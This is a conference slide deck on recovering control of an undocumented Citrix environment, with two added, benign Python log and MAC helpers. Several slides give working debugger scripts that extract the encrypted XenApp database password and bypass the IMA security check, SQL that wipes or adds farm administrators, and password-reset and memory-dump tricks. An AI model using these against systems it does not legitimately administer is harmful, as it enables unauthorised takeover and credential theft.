How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment. How Do You Figure out What's What?)

Imagine that you just found the new job of your dreams: You are now a system administrator in a large enterprise. Everything is going like clockwork, except for one major problem: There are 5 different versions of Presentation Server in use and there is no documentation for any system. Now imagine you are a consultant ready to do an assessment of Citrix infrastructure, but nobody in the company knows how many farms and servers exist, or how they are configured. (Wanting a new imaginary job yet?) In this session, Denis Gundarev will share tips on how to document infrastructure and tricks on how to find all components or users that are "forgotten." Attendees will learn several methods for elevating permissions and taking ownership of forgotten systems.

Published in: Technology


1. Welcome
BriForum | © TechTarget

2. So, You Just Inherited Someone Else's Citrix Environment. How Do You Figure out What's What?
Denis Gundarev, Consultant, Entisys Solutions

3. About presenter

```
C:\>whoami /all

USER INFORMATION
----------------
User Name       Twitter Name  E-Mail
==============  ============  ==================
ENTISYS\denisg  @fdwl         DenisG@entisys.com

GROUP INFORMATION
-----------------
Group Name                      Type              SID
==============================  ================  ============
Citrix Technology Professional  Well-known group  S-1-5-32-544
Citrix Certified Instructor     Hobby             S-1-5-32-545
Microsoft Certified Trainer     Hobby             S-1-5-32-546
```

4. Disclaimer
● Information in this presentation is intended for educational purposes only. Some topics in this presentation may contain information related to "Hacking Passwords" or "Elevating permissions" (or similar terms). These topics provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorized access. However, you may try out these hacks on your own computer at your own risk.
● Some of the stuff that you will learn is dangerous; playing with this knowledge on your production environment can make you very unhappy.

5. Agenda
● Why do you need to hack your Citrix environment?
● How to find your servers?
● pwn Windows boxes
● pwn Windows-based Citrix products
● pwn *NIX-based Citrix products
● How to find your clients

6. Why do you need to hack your Citrix environment?
1. Install 10 XenApp Servers
2. Wait for one year
3. Try to remember the ODBC password to add more servers

1. Change your password on Friday
2. Go to the night club
3. …
4. PROFIT!!

7. How to start your investigation

8. How to find at least one XenApp Server
● Use ipscan to find at least one server with open ports 1494 and 2598
● Open an ICA file downloaded from the WebInterface/PNAgent site

9. How to Find Other Servers
● CTX101810 - Communication Ports Used By Citrix Technologies – 20 pages
● VMware KB 1012382
● Microsoft - http://technet.microsoft.com/en-us/library/cc875824.aspx & KB832017

10. Thank you, Captain Obvious

11. Find all servers in the farm using XML
● Use XmlServiceDigger/XmlServiceExplorer from Nicholas Dille (sepago)

12. Find all servers in the farm using ICA Client

```vbscript
' Enumerate the farm and its servers through the ICA Client COM object.
' Usage: cscript enumfarm.vbs <HTTP browser address>
Dim client, servers, j
Set client = WScript.CreateObject("Citrix.ICAClient")
client.SetProp "HTTPBrowserAddress", WScript.Arguments(0)
WScript.Echo "Farm:" & client.GetEnumNameByIndex(client.EnumerateFarms(), 0)
servers = client.EnumerateServers()
j = 0
Do While j < client.GetEnumNameCount(servers)
    WScript.Echo "SERVER:" & client.GetEnumNameByIndex(servers, j)
    j = j + 1
Loop
```

13. Find All HTTP clients
● On the XenApp server – change the XML Service to be shared with IIS
● Look at the IIS logs; all HTTP clients will be there

14. What can be a HTTP Client?
● WebInterface
● NetScaler
● Program Neighborhood
● ICA files with HTTPBrowserAddress - TCP/UDP browser is not supported from ICA Client 11.1

15. Physical or Virtual?
● Why do we need this info?
  - To get administrative access, in most cases you need "physical" access to the server
● Get the MAC address and look it up in a MAC address DB:
  - http://www.coffer.com/mac_find
  - 00-15-5D – Hyper-V
  - 00-50-56 – VMware
  - Random – XenServer
● Find the hypervisor host
  - Hyper-V – HKLM\SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters\PhysicalHostNameFullyQualified
  - VMware, XenServer – packet capture

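The OUI lookup from this slide, as an added example that is not part of the original deck: it classifies the MAC addresses in a host inventory using the two prefixes quoted above (00-15-5D for Hyper-V, 00-50-56 for VMware). Because XenServer guests get random MACs, an unknown prefix is further split by the IEEE locally-administered bit (bit 1 of the first octet), which generated addresses normally set and burned-in NIC addresses do not; that split is a general rule, not something the slide states. The hostnames and MACs in the sample inventory are constructed.

```python
"""Guess physical vs. virtual from a server's MAC address (OUI lookup).

Added example, not from the original deck. KNOWN_OUIS holds only the two prefixes
quoted on the slide; anything else is classified by the locally-administered bit.
"""
import re
from typing import Dict

# OUI prefixes from the slide, as upper-case hex without separators.
KNOWN_OUIS = {
    "00155D": "Hyper-V",
    "005056": "VMware",
}

UNKNOWN_LOCAL = "unknown OUI, locally administered (likely generated, e.g. XenServer)"
UNKNOWN_GLOBAL = "unknown OUI, globally assigned (likely a physical NIC)"


def normalize_mac(mac: str) -> str:
    """Accept 00-15-5D-.., 00:15:5d:.., 0015.5d.. or bare hex; return 12 upper-case hex digits."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if not re.fullmatch(r"[0-9A-F]{12}", digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    return digits


def is_locally_administered(mac: str) -> bool:
    """True when the U/L bit (0x02) of the first octet is set."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def classify_mac(mac: str) -> str:
    """Vendor for a known OUI, otherwise a hint based on the locally-administered bit."""
    digits = normalize_mac(mac)
    vendor = KNOWN_OUIS.get(digits[:6])
    if vendor:
        return vendor
    return UNKNOWN_LOCAL if is_locally_administered(digits) else UNKNOWN_GLOBAL


def classify_inventory(hosts: Dict[str, str]) -> Dict[str, str]:
    """hostname -> classification for a {hostname: mac} inventory."""
    return {name: classify_mac(mac) for name, mac in hosts.items()}


# Constructed sample inventory (not real hosts).
SAMPLE_INVENTORY = {
    "xa01": "00-15-5D-01-02-03",   # Hyper-V OUI
    "xa02": "00:50:56:aa:bb:cc",   # VMware OUI
    "xa03": "6a-1f-9c-3e-77-10",   # 0x6a has the U/L bit set: generated address
    "xa04": "3c-97-0e-12-34-56",   # 0x3c does not: looks like a burned-in NIC address
}

if __name__ == "__main__":
    for host, kind in classify_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {kind}")
```

The table is deliberately tiny; for a real inventory, feed it the full IEEE OUI list and treat the locally-administered hint as exactly that, since some physical NICs and most cloned VMs also carry locally administered addresses.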
16. Breaking into hypervisor
● XenServer - CTX116019
● VMware ESX - KB1317898, same procedure as for XenServer
● VMware ESXi – password reset not supported, but possible: http://tinyurl.com/ResetESXiPass
● Hyper-V – just Windows, next topic

17. Get Access to the Windows Box
● Use a domain admin account or GPO to get access (if possible)
● Sometimes you need to reset the local admin password:
  - Access to non-domain servers
  - "broken" Provisioning Services .vhd
  - Domain controllers

18. Get Access to the Windows Box
● Requirements:
  - Access to the physical console
  - Offline NT Password and Registry Editor (http://pogostick.net/~pnh/ntpasswd/)
● Bonus – reset domain admin account password
  - SrvAny from the resource kit

19. Get Access to the Windows Box - Demo

20. XenApp ODBC Password
● SQL Server name and database name are stored in MF20.dsn
● Username and password are stored in HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Citrix\IMA\Datastore
● L$ImaDBPassword and L$ImaDBUsername are encrypted
● DSMAINT CONFIG is able to encrypt this data

21. XenApp ODBC Password - DEMO

22. XenApp ODBC Password - DEMO
● CryptoAPI tracer: http://tinyurl.com/CryptoAPITracer

Debugger script (c:\showpass.txt):

```
!sym quiet;
bp Crypt32!CryptUnprotectData "bp /t @$thread poi(@esp) "; du poi(poi(@esp-4)+4); G;";G;";
!sym quiet;
*.srcnoisy 0;
sxi ld
.outmask- 0xFFFFFFEE  $$ .outmask /d restores the output mask to default
* Create the log and begin
.logopen "c:\log.txt";G
gq
```

● Run debugger:

```
cdb -cf c:\showpass.txt dsmaint config /user:<username>
```

23. SlimJim
● Deletes all Citrix administrators from the data store to allow control of the farm by the local administrator.
● Works only on CPS/XA5
● Directly executes the SQL commands that delete any administrators configured
● Doesn't work on XA6/6.5 because of the new DB schema

24. SlimJim for XenApp 6.5

```sql
delete INDEXTABLE FROM KEYTABLE INNER JOIN INDEXTABLE ON KEYTABLE.nodeid = INDEXTABLE.nodeid WHERE (KEYTABLE.parentid = 42)
go
delete KEYTABLE from KEYTABLE where parentid = 42
go
```

● Where is this "42" coming from?
  - DSView from the support\debug folder on the XenApp CD
  - Directory -> ServerNeighborhoods -> <FarmName> -> AdminTool -> Users cid

25. SlimJim for XenApp 6.5

26. SlimJim for XenApp 6.5 - Easiest way
● Download SlimJim for XenApp 6 from http://citrixtechs.com/blog/?p=56 (thanks to Carl Lenocker!)
● Install Windows Debugging Tools
● Run the batch file

27. SlimJim for XenApp 6.5 - Easiest way (cont.)
● What does it actually do?
1. Attaches a debugger to the IMA Service and bypasses the security check:

```
start ntsd -pn imasrv.exe -pd -c "bu ImaRass!CtxSecurityCheck;r $t0 = %loopcount%;.while(@$t0){r $t0 = @$t0-1;pa @$ra;r eax=0x00000001;g};pa @$ra;r eax=0x00000001;.detach;q"
```

2. Runs cscript addadmin-mod.wsf:

```vbscript
Set theFarm = CreateObject("XenappCOM.XenappFarm")
Set NewAdmin = theFarm.AddAdmin
NewAdmin.AdminType = MFAdminPermissionFullAccess
NewAdmin.Enable = 1
NewAdmin.AAType = MFAccountAuthorityNTDomain
NewAdmin.AAName = computername
NewAdmin.AccountType = MFAccountLocalGroup
NewAdmin.AccountName = "Administrators"
NewAdmin.SaveData
```

28. Get access to the SQL DB
● By default, NT AUTHORITY\SYSTEM has the sysadmin role

29. (picture slide, no text)

30. XenDesktop

31. XenDesktop

```powershell
Add-PSSnapin citrix.*
New-BrokerAdministrator -Name corptest -FullAdmin 1
New-AcctAdministrator -Account corptest
New-PvsVmAdministrator -Account corptest
New-ConfigAdministrator -Account corptest
New-HypAdministrator -Account corptest
New-ProvAdministrator -Account corptest
```

32. Provisioning Services

```sql
INSERT INTO [AuthGroup]
       ([authGroupId]
       ,[authGroupName]
       ,[authGroupGuidName]
       ,[description])
VALUES ('UNIQUE00-GUID-4D0D-B834-15EA4A9F41EA'
       ,N'DOMAIN.FQDN.COM/Users/Domain Users'
       ,N'de56c6b1-06ef-4ed6-85b8-a130f036d075'
       ,'')
GO
INSERT INTO [AuthGroupFarm]
       ([authGroupId])
VALUES ('UNIQUE00-GUID-4D0D-B834-15EA4A9F41EA')
GO
```

● de56c6b1-06ef-4ed6-85b8-a130f036d075 – GUID from adsiedit

33. Find your clients

34. XenApp
● Configure Resource Manager, then use SQL Report Builder to create reports (or just export data to Excel)
● Install EdgeSight, use reports
● OR…
● Use Event Logs
  - Windows 2003 – Security log
  - Windows 2008

35. XenApp on Windows 2003
● Use the security log
● Schedule a simple script:

```vbscript
' List user name and client address for every session in the farm (MFCOM)
Dim objFarm, objSession
Set objFarm = CreateObject("MetaFrameCOM.MetaFrameFarm")
objFarm.Initialize(1)   ' 1 = MetaFrameWinFarmObject
For Each objSession In objFarm.Sessions
    WScript.Echo objSession.UserName & "," & objSession.ClientAddress
Next
```

36. XenApp on Windows 2008
● Use the dedicated log Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
● Attach the same script to the event
● OR read the registry:
● HKEY_LOCAL_MACHINE\SOFTWARE\Citrix\Ica\Session\<sessionN>\Connection

37. XenDesktop
● Configure the retention period for connection log entries:
  - HKEY_LOCAL_MACHINE\Software\Citrix\DesktopServer\Logging\ConnectionLogLifetimeHours
  - Default period is 2 days
● Use Desktop Director to analyze connections
● OR
● Use the Get-BrokerConnectionLog PowerShell command to export the log and analyze it using Excel

38. NetScaler
● Configure Web Logging on a Windows box (or Linux, if you like) to get logs in standard W3C or NCSA formats
  - http://support.citrix.com/article/CTX123504
  - http://support.citrix.com/article/CTX123977

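Both the "find all HTTP clients" step (slide 13, IIS logs of the shared XML Service) and the NetScaler web logging step (slide 38, W3C or NCSA output) end with the same task: reading a web log and listing who connects. The Python below is an added example, not code from the deck, that parses both formats, driving the W3C parser from the `#Fields:` directive so a column order change (or a re-emitted header after an IIS restart) does not misalign the data, and then counts requests per client IP. The log lines are constructed; the path `/scripts/wpnbr.dll` is assumed here to be the IIS-shared XML Service endpoint.

```python
"""Client inventory from IIS (W3C extended) and NetScaler (W3C or NCSA) web logs.

Added example, not from the original deck. XML_SERVICE_PATH is an assumption;
the sample log lines are constructed.
"""
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional

XML_SERVICE_PATH = "/scripts/wpnbr.dll"  # assumed endpoint of the IIS-shared XML Service

# NCSA common log format: host ident authuser [date] "request" status bytes
_NCSA_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<date>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>\S+))?" (?P<status>\d{3}) (?P<bytes>\S+)'
)


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse W3C extended log lines; column names come from the #Fields: directive."""
    fields: Optional[List[str]] = None
    records = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()  # may recur mid-file after a restart
            continue  # #Software, #Version, #Date carry no records
        if fields is None:
            raise ValueError("W3C data line before any #Fields: directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def parse_ncsa(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse NCSA common log lines into the same keys the W3C parser produces."""
    records = []
    for raw in lines:
        m = _NCSA_RE.match(raw.strip())
        if not m:
            continue
        records.append({
            "c-ip": m.group("host"),
            "cs-username": m.group("user"),
            "cs-method": m.group("method"),
            "cs-uri-stem": m.group("path"),
            "sc-status": m.group("status"),
        })
    return records


def parse_log(lines: List[str]) -> List[Dict[str, str]]:
    """Autodetect the format: a #Fields: directive means W3C, otherwise NCSA."""
    if any(l.startswith("#Fields:") for l in lines):
        return parse_w3c(lines)
    return parse_ncsa(lines)


def client_inventory(records: List[Dict[str, str]], path_filter: Optional[str] = None) -> Dict[str, int]:
    """Requests per client IP, optionally restricted to one URI stem (case-insensitive)."""
    counts: Counter = Counter()
    for r in records:
        if path_filter and r.get("cs-uri-stem", "").lower() != path_filter.lower():
            continue
        counts[r["c-ip"]] += 1
    return dict(counts)


# Constructed IIS W3C log: two XML Service clients plus an unrelated browser hit.
IIS_SAMPLE = """#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2012-05-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2012-05-01 08:00:01 10.0.0.5 POST /scripts/wpnbr.dll - 80 - 10.0.1.20 - 200 0 0 15
2012-05-01 08:00:02 10.0.0.5 POST /scripts/wpnbr.dll - 80 - 10.0.1.21 - 200 0 0 12
2012-05-01 08:00:03 10.0.0.5 GET /iisstart.htm - 80 - 10.0.9.9 Mozilla/5.0 200 0 0 3
2012-05-01 08:00:04 10.0.0.5 POST /scripts/wpnbr.dll - 80 - 10.0.1.20 - 200 0 0 14
"""

# Constructed NetScaler NCSA log.
NS_SAMPLE = """10.0.2.30 - - [01/May/2012:08:00:01 +0000] "GET /Citrix/XenApp/ HTTP/1.1" 200 5120
10.0.2.31 - jdoe [01/May/2012:08:00:05 +0000] "POST /Citrix/XenApp/auth/login.aspx HTTP/1.1" 302 0
10.0.2.30 - - [01/May/2012:08:00:09 +0000] "GET /Citrix/XenApp/site/default.aspx HTTP/1.1" 200 9000
"""

if __name__ == "__main__":
    print("XML Service clients:", client_inventory(parse_log(IIS_SAMPLE.splitlines()), XML_SERVICE_PATH))
    print("NetScaler clients:", client_inventory(parse_log(NS_SAMPLE.splitlines())))
```

Filtering on the XML Service path is what separates real XML clients (Web Interface, NetScaler, PNAgent, ICA files with an HTTPBrowserAddress) from ordinary browser traffic on the same IIS instance; without the filter the inventory also lists anyone who opened the default page.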
39. What else?
● XenServer – try to run "xe secret-list" at home
● Licensing Server – just edit configuration files
● XenServer WLB – reset the Postgres password, google it
● Task Manager -> Dump process -> strings – look for username -> look around

40. Conclusion
1. Use Google
2. Explore SQL databases
3. Learn how to use Windows Debugger
4. Read SDK documentation
5. Don't forget about physical security

41. TBD: put some funny picture on the last slide
